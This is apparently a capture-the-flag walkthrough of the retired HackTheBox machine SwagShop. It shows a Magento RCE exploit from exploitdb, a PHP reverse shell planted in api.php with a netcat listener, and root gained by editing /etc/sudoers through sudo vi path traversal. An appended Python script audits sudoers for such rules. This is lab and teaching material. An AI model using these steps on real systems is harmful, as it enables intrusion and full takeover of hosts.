SwagShop is a pretty easy Linux box on HackTheBox. By now it has retired, which is why I am posting this walkthrough. This is also my first successful hack in HTB.
The steps are as follows:
As we don't know anything about the machine yet, we will start by opening it in the browser and then running nmap on it.
nmap -A 10.10.10.140
Now, we would like to see what directories or files are on the web server. To do that, we will use dirb.
As we surf through the website, we will find that it is based on something called Magento.
Let's google it and find out what it is.
While surfing through the website, view the page sources and check the results from dirb; you should find a login panel.
Now, let's google for Magento exploits to see if there are any pre-written exploits that we can use.
You should find one in exploitdb.
Another way of finding if there is an exploit for something is by using searchsploit. Let's try it in the terminal.
Here, we can see a few exploits. Let's check the one named 37977.py, as it is in the xml/webapps category and gives remote code execution.
Now, let's copy that script to our present working directory.
cp /usr/share/exploitdb/exploits/xml/webapps/37977.py /HTB/SwagShop/exploit.py
In the script, let's change the URL to add /index.php/ to it.
Now, we can try and run this script.
It should display account credentials as the output; use them to log in to the system.
In your Kali machine, you should have a PHP reverse shell file in /usr/share/webshells/php/. Copy this reverse shell to your current working directory.
cp /usr/share/webshells/php/php-reverse-shell.php /HTB/SwagShop/shell.php
Open it with the editor of your choice and change the host to your machine's address and the port to 4444.
Now, in the web browser, as you have logged in, in the menu, go to System -> Filesystem.
Open the api.php file and then add the content of the reverse shell to it.
Now, come back to the terminal and use netcat to listen for incoming connections to your machine on port 4444.
nc -nvlp 4444
Run the .php file by browsing to 10.10.10.140/api.php.
Now, you should get a reverse shell.
It's time to make the shell better.
Do that by using the following commands (the second is the standard Python pty shell spawn):
export TERM=linux
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now, to get the user's flag, read the user.txt file in the user's home directory.
Now, the final step: privilege escalation.
Let's see if our user has the ability to use the sudo command.
You should see that our user can use sudo with the vi command in the directory /var/www/html.
Let's try accessing the sudoers file from here.
sudo vi /var/www/html/../../../etc/sudoers
Cool, it opens.
Now, go to the end and add the following line:
www-data ALL=(ALL) NOPASSWD:ALL
Save and exit: hit ESC and then type :wq.
Now, start a new bash shell using sudo.
Now, all we need to do is read the contents of the root.txt file.
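The privilege escalation above works because a sudo rule that limits vi to one directory does not actually contain it: the editor follows ../ to any path and can run commands. As an added example (not part of the original walkthrough, and not the box's real sudoers file), here is a small Python audit that flags such rules, along with the NOPASSWD:ALL line the walkthrough adds; the sample sudoers text is constructed.

```python
import re
from pathlib import PurePosixPath

# Programs that, once running as root, can open any file and run shell
# commands, so limiting their argument to one directory does not contain them.
EDITOR_LIKE = {"vi", "vim", "view", "nano", "less", "more"}

# user host=(runas) TAG: cmd1, cmd2   (runas and tags are optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return one finding string per risky command grant in sudoers text."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE_RE.match(line)
        if not m or m["user"] == "root":              # root is expected to have ALL
            continue
        user = m["user"]
        suffix = " without a password" if "NOPASSWD" in m["tags"] else ""
        for cmd in (c.strip() for c in m["cmds"].split(",") if c.strip()):
            binary, *args = cmd.split()
            name = PurePosixPath(binary).name
            if cmd == "ALL":
                findings.append(f"{user}: may run any command as root{suffix}")
            elif name in EDITOR_LIKE:
                scope = args[0] if args else "any file"
                findings.append(
                    f"{user}: {name} as root on {scope}{suffix}; an editor "
                    "can open any path (../ escapes the directory) and run commands")
    return findings

# Constructed sample, not the box's real sudoers file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root      ALL=(ALL:ALL) ALL
backup    ALL=(root) /usr/bin/rsync
www-data  ALL=NOPASSWD: /usr/bin/vi /var/www/html/*
www-data ALL=(ALL) NOPASSWD:ALL
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

The fix on a real host is to grant a non-interactive tool (or sudoedit on a fixed file list) instead of an editor, and to review sudoers for the NOPASSWD:ALL line whenever a web service account appears in it.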
And, that's all! It wasn't that tough, was it?